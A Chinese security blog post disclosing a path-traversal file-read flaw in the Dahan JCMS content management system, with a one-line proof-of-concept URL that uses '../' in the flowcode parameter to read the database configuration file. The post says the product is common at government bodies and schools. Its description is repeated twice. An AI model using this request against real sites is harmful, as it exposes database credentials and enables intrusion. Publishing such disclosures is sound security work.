大汉版通JCMS数据库配置文件读取漏洞

没穿底裤 2020年1月1日02:51:06评论2,065 views字数 274阅读0分54秒阅读模式
摘要

简要描述:
大汉JCMS内容管理系统由于对文件读取时没有对文件路径进行过滤,导致可以直接直接读取数据库配置文件,该产品政府部门以及学校使用较多,可导致数据库泄露或者getshell
详细说明:
由于读取xml文件时没有对传进的参数进行过滤,flowcode参数可控,配置文件地址WEB-INF/config/dbconfig.xml,由于控制了文件后缀,只能读取xml文件

简要描述:
大汉JCMS内容管理系统由于对文件读取时没有对文件路径进行过滤,导致可以直接直接读取数据库配置文件,该产品政府部门以及学校使用较多,可导致数据库泄露或者getshell
详细说明:
由于读取xml文件时没有对传进的参数进行过滤,flowcode参数可控,配置文件地址WEB-INF/config/dbconfig.xml,由于控制了文件后缀,只能读取xml文件

漏洞证明:

http://0day5.com/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日02:51:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大汉版通JCMS数据库配置文件读取漏洞http://cn-sec.com/archives/75351.html

发表评论

匿名网友 填写信息